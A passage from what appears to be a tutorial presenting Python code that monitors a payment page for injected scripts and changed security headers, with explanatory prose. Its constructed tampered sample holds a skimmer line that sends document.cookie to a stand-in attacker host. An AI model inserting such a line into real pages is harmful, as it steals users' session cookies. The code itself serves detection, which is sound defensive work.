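    "x-frame-options",
)


class ScriptCollector(HTMLParser):
    """Collect external <script src> values and SHA-256 digests of inline scripts."""

    def __init__(self):
        super().__init__()
        self.external = set()
        self.inline = set()
        self._in_inline = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.add(src)
        else:
            self._in_inline = True
            self._buf = []

    def handle_data(self, data):
        if self._in_inline:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag.lower() == "script" and self._in_inline:
            body = "".join(self._buf).strip().encode("utf-8")
            self.inline.add(hashlib.sha256(body).hexdigest())
            self._in_inline = False


def snapshot(headers, html):
    """Reduce one fetch of the payment page to the items worth comparing."""
    lowered = {k.lower(): v for k, v in headers.items()}
    collector = ScriptCollector()
    collector.feed(html)
    return {
        "headers": {h: lowered.get(h) for h in MONITORED_HEADERS},
        "external": collector.external,
        "inline": collector.inline,
    }


def detect_changes(baseline, current):
    """Return human-readable differences between two snapshots (empty list = no change)."""
    changes = []
    for h in MONITORED_HEADERS:
        if baseline["headers"][h] != current["headers"][h]:
            changes.append(f"header {h} changed")
    for src in sorted(current["external"] - baseline["external"]):
        changes.append(f"new external script {src}")
    for src in sorted(baseline["external"] - current["external"]):
        changes.append(f"removed external script {src}")
    for digest in sorted(current["inline"] - baseline["inline"]):
        changes.append(f"new or modified inline script sha256={digest[:16]}")
    for digest in sorted(baseline["inline"] - current["inline"]):
        changes.append(f"baseline inline script no longer present sha256={digest[:16]}")
    return changes


# Constructed sample data: a known-good fetch and a later fetch in which a
# skimmer script has been injected and the CSP loosened to allow it.
BASELINE_HEADERS = {
    "Content-Security-Policy": "default-src 'self'; script-src 'self'; frame-src https://psp.example",
    "Strict-Transport-Security": "max-age=31536000",
    "X-Frame-Options": "DENY",
}
BASELINE_HTML = """<html><head>
<script src="/static/checkout.js"></script>
<script>window.cfg = {psp: "https://psp.example"};</script>
</head><body><iframe src="https://psp.example/card-form"></iframe></body></html>"""

TAMPERED_HEADERS = dict(BASELINE_HEADERS)
TAMPERED_HEADERS["Content-Security-Policy"] = (
    "default-src 'self'; script-src 'self' https://cdn.attacker.example; frame-src https://psp.example"
)
TAMPERED_HTML = """<html><head>
<script src="/static/checkout.js"></script>
<script src="https://cdn.attacker.example/x.js"></script>
<script>window.cfg = {psp: "https://psp.example"};
fetch("https://cdn.attacker.example/c?" + document.cookie);</script>
</head><body><iframe src="https://psp.example/card-form"></iframe></body></html>"""


def demo():
    """Compare the constructed tampered fetch against the constructed baseline."""
    baseline = snapshot(BASELINE_HEADERS, BASELINE_HTML)
    return detect_changes(baseline, snapshot(TAMPERED_HEADERS, TAMPERED_HTML))


if __name__ == "__main__":
    for change in demo():
        print("ALERT:", change)
```

Running the script reports the loosened Content-Security-Policy, the added external script and the modified inline script as four separate alerts, while comparing the baseline with itself returns an empty list. Hashing inline script bodies rather than storing them keeps the baseline small and still catches a single appended line; external scripts are tracked by source URL here, and a fuller implementation would also fetch and hash their contents, since a skimmer can be introduced by changing a file at an unchanged URL.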
